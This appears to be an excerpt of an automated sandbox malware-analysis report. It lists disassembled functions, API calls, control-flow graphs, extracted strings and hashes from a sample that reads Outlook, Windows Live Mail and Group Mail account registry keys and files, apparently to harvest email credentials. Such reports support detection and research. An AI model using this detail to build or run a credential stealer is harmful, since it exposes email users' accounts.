                                                                                                                                                                                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                                  Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 317 402c5d-402c81 call 410a9c 320 402da5-402db0 317->320 321 402c87-402cb7 memset call 410b62 317->321 324 402d9c-402d9f RegCloseKey 321->324 325 402cbd-402cbf 321->325 324->320 326 402cc4-402d2d call 410b1e memset sprintf call 410a9c 325->326 331 402d3a-402d6b sprintf call 410a9c 326->331 332 402d2f-402d35 call 402bd1 326->332 336 402d7a-402d8a call 410b62 331->336 337 402d6d-402d75 call 402bd1 331->337 332->331 340 402d8f-402d94 336->340 337->336 340->326 341 402d9a-402d9b 340->341 341->324
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                    • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                    • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                  • API String ID: 1831126014-3814494228
                                                                                                                                                                                  • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                  • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                  • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                                  Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                    • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                  • memset.MSVCRT ref: 00444379
                                                                                                                                                                                  • memset.MSVCRT ref: 00444394
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                  • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Store Root, xrefs: 004443A5
                                                                                                                                                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                  • API String ID: 1502082548-2578778931
                                                                                                                                                                                  • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                                  Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 363 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 368 40f5c3-40f5ea RegQueryValueExA 363->368 369 40f6d9-40f6df 363->369 370 40f6d0-40f6d3 RegCloseKey 368->370 371 40f5f0-40f5f4 368->371 370->369 371->370 372 40f5fa-40f604 371->372 373 40f606-40f618 call 40466b call 404734 372->373 374 40f677 372->374 384 40f66a-40f675 call 404785 373->384 385 40f61a-40f63e call 4047a5 373->385 376 40f67a-40f67d 374->376 376->370 377 40f67f-40f6bf call 4012ee RegQueryValueExA 376->377 377->370 383 40f6c1-40f6cf 377->383 383->370 384->376 385->384 390 40f640-40f643 385->390 391 40f661-40f664 LocalFree 390->391 392 40f645-40f65a memcpy 390->392 391->384 392->391
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2012582556-3916222277
                                                                                                                                                                                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                                  Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 393 4037ca-40381c memset * 2 call 444551 396 4038e2-4038e5 393->396 397 403822-403882 call 4021b6 call 406f06 * 2 strchr 393->397 404 403884-403895 _mbscpy 397->404 405 403897-4038a2 strlen 397->405 406 4038bf-4038dd _mbscpy call 4023e5 404->406 405->406 407 4038a4-4038bc sprintf 405->407 406->396 407->406
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                  • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                  • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                  • String ID: %s@yahoo.com
                                                                                                                                                                                  • API String ID: 317221925-3288273942
                                                                                                                                                                                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                                  Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 409 4036e5-4036f5 410 4037c6-4037c7 409->410 411 4036fb-403709 call 410863 409->411 413 40370e-403710 411->413 414 4037c5 413->414 415 403716-40372a strchr 413->415 414->410 415->414 416 403730-403787 call 4021b6 _mbscpy * 2 strlen 415->416 419 4037a4-4037c0 _mbscpy call 4023e5 416->419 420 403789-4037a1 sprintf 416->420 419->414 420->419
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                    • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                    • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                  • String ID: %s@gmail.com
                                                                                                                                                                                  • API String ID: 3261640601-4097000612
                                                                                                                                                                                  • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                  • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                  • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                  Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 422 4034e4-403544 memset * 2 call 410b1e 425 403580-403582 422->425 426 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 422->426 426->425
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403504
                                                                                                                                                                                  • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                  • API String ID: 3071782539-966475738
                                                                                                                                                                                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                                  Function 00408DB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 431 408db6-408dbd 432 408dc4-408dd0 431->432 433 408dbf call 408d34 431->433 435 408de2 432->435 436 408dd2-408ddb 432->436 433->432 439 408de4-408de6 435->439 437 408e0d-408e1c 436->437 438 408ddd-408de0 436->438 437->439 438->435 438->436 440 408f07 439->440 441 408dec-408df2 439->441 442 408f09-408f0b 440->442 443 408df4-408e04 441->443 444 408e1e-408e25 441->444 447 408e05-408e0b 443->447 445 408e27-408e47 _mbscpy call 409240 444->445 446 408e6b-408e7e call 408f0c 444->446 454 408e49-408e59 strlen 445->454 455 408e5b-408e69 445->455 448 408e7f-408e87 LoadStringA 446->448 447->448 453 408e89 448->453 456 408f00-408f05 453->456 457 408e8b-408e9a 453->457 454->453 454->455 455->447 456->442 457->456 458 408e9c-408ea8 457->458 458->456 459 408eaa-408efe memcpy 458->459 459->440 459->456
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                  • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                  • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                  • strings, xrefs: 00408E27
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                  • API String ID: 4036804644-4125592482
                                                                                                                                                                                  • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                  • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                                                                                                                  Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 460 410863-41088b UuidFromStringA * 2 461 4108dd 460->461 462 41088d-41088f 460->462 463 4108df-4108e2 461->463 462->461 464 410891-4108aa call 410827 462->464 466 4108af-4108b1 464->466 466->461 467 4108b3-4108b9 466->467 468 4108bb-4108bd 467->468 469 4108be-4108db memcpy CoTaskMemFree 467->469 468->469 469->463
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                  • API String ID: 1640410171-3316789007
                                                                                                                                                                                  • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                  • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                  • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                  Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                    • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                  • String ID: ACD
                                                                                                                                                                                  • API String ID: 1886237854-620537770
                                                                                                                                                                                  • Opcode ID: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                  • Opcode Fuzzy Hash: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                  Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2054149589-0
                                                                                                                                                                                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                  Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 00408620
